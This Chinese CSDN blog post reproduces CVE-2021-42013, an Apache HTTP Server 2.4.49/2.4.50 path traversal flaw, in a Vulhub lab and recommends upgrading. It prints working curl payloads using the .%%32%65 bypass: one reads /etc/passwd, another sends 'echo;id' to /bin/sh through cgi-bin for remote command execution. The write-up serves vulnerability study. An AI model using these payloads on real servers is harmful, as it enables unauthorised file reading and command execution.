【漏洞复现】Apache_HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)

最新推荐文章于 2024-08-08 21:21:21 发布
最新推荐文章于 2024-08-08 21:21:21 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: # 漏洞复现 文章标签: apache http 网络协议 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/134221236
版权
本文详细描述了ApacheHTTPServer2.4.49和2.4.50中的CVE-2021-42013漏洞,涉及路径遍历攻击,影响范围广。提供了漏洞复现步骤和两种验证方式,强调了升级至最新版本以修复此高危漏洞。
摘要由CSDN通过智能技术生成

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明内容
漏洞编号CVE-2021-42013
漏洞名称Apache HTTP_2.4.50_路径穿越漏洞
漏洞评级高危
影响范围2.4.49
2.4.50
漏洞描述CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞,攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件。
修复方案升级至最新版本

1.1、漏洞描述

CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞,攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件

此漏洞影响Apache HTTP Server 2.4.49和2.4.50,而不影响更早版本。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49以及2.4.50两个版本

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2021-42013

启动测试环境:

docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到Apache HTTP ServerIt works!

在这里插入图片描述

2、漏洞扫描

在这里插入图片描述

3、漏洞验证

Apache HTTP Server 2.4.50修补了以前的CVE-2021-41773漏洞

但可以使用.%%32%65进行绕过(注意其中的/icons/必须是一个存在且可访问的目录)

方式一 curl
 curl -v --path-as-is http://192.168.80.141:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在这里插入图片描述

在服务器上启用mods cgi或cgid后,此路径遍历漏洞将允许执行任意命令

 curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

在这里插入图片描述

方式二 bp抓捕

在这里插入图片描述

在这里插入图片描述

1.5、修复建议

升级至最新版本

过期的秋刀鱼-
关注
专栏目录
CVE-2021-42013 Apache路径穿越&命令执行漏洞复现
afei001
10-10 2424
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.3 CVE-2021-42013 POC 5.修复建议 1.漏洞概述 CVE-2021-42013是由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。 2.影响版本 仅影响...
CVE-2021-42013-Apache HTTP Server 2.4.50路径穿越流量特征
12306小哥
10-10 1417
0x1 简介 Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
weixin_64655821的博客
10-13 2137
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
Apache HTTPD 换行漏洞CVE-2017-15715)
最新发布
sleepywin的博客
08-08 328
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
CVE-2021-42013  Apache HTTP Server 路径穿越漏洞
蚁景网安学院
03-03 2735
前言CVE-2021-42013为目录穿越文件读取漏洞,影响 httpd 2.4.49,CVE编号为CVE-2021-41773, https 2.4.50不完全修复可绕过,如果开启 mo...
CVE-2021-42013 漏洞复现
爱吃仡坨的Blog
10-13 585
Apache HTTP Server 2.4.50版本对CVE-2021-41773的修复可以避免一次url编码导致的路径穿越,但是由于在请求处理过程中,还会调用ap_unescape_url函数对参数再次进行解码,使得需进行两次解码,但即使这样仍然会导致路径穿越
CVE-2021-42013漏洞复现
虚心学习,脚踏实地
04-28 265
Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3277
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
CVE-2021-41773 && CVE-2021-42013 Apache HTTPd最新RCE漏洞复现 && 目录穿越漏洞
weixin_45694388的博客
10-16 3482
漏洞描述: Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制
Apache HTTPd 2.4.49 路径穿越漏洞CVE-2021-41773)复现
weixin_59086772的博客
12-10 2536
0x00 漏洞概述 2021年10月5日,Apache官方发布了一批漏洞信息,其中Apache HTTP Server路径穿越漏洞CVE-2021-41773。 满足条件: 版本等于2.4.49 穿越的目录允许被访问,比如配置了Require all granted。(默认情况下是不允许的) 0x01环境搭建 使用docker搭建Apache HTTPd 2.4.49版本服务器: Dockerfile FROM vulhub/httpd:2.4.49 LABEL mai
CVE-2021-42013 Apache HTTP Server 路径穿越漏洞——漏洞复现
qq_60905276的博客
06-07 4928
Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。
CVE-2021-42013 路径穿越漏洞复现并反弹shell
m0_53073183的博客
02-01 1537
CVE-2021-42013 路径穿越漏洞复现并反弹shell
漏洞复现】Apahce HTTPd 2.4.49(CVE-2021-41773)路径穿越漏洞
中二电工吹短笛的博客
05-09 600
是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了中的一个路径遍历和文件泄露漏洞。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。
Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞CVE-2021-42013
weixin_53639243的博客
02-29 422
Apache HTTP 服务器项目旨在为现代操作系统(包括 UNIX 和 Windows)开发和维护开源 HTTP 服务器。Apache HTTP Server 2.4.50 修补了之前的 CVE-2021-41773 有效负载,但它不完整。修复不完整导致的漏洞,攻击者可以使用路径遍历攻击将 URL 映射到类别名指令配置的目录之外的文件。此漏洞影响 Apache HTTP Server 2.4.49 和 2.4.50 以及更早版本。默认页面:http://192.168.92.130:8080。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 1086
任务环境说明:服务器场景:Server1。
WindowsServer Apache2.4 2个轻微漏洞的解决办法
weixin_33671935的博客
12-20 430
问题1:windows apache设置X-Frame-Options的方法1、打开 httpd.conf2、把 #LoadModule headers_module 前面的 # 号去掉3、在http.conf文件最末尾增加:Header always append X-Frame-Options SAMEORIGIN4、重启ApacheX-Frame-Options 有三个值:DENY表示该页面...
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
MateSnake的博客
05-29 1341
Apache漏洞复现:【CVE-2021-42013】&【CVE_2021_41773】&【CVE-2017-15715】
Tiki组件漏洞复现CVE-2020-15906和CVE-2021-26119研究
资源摘要信息: "Tiki组件CVE-2020-15906与CVE-2021-26119复现教程" 知识点: 1. Tiki组件介绍: Tiki是一个内容管理框架,它提供了一套丰富的功能,比如Wiki、论坛、新闻稿发布和图片库等。它具有可扩展性,用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值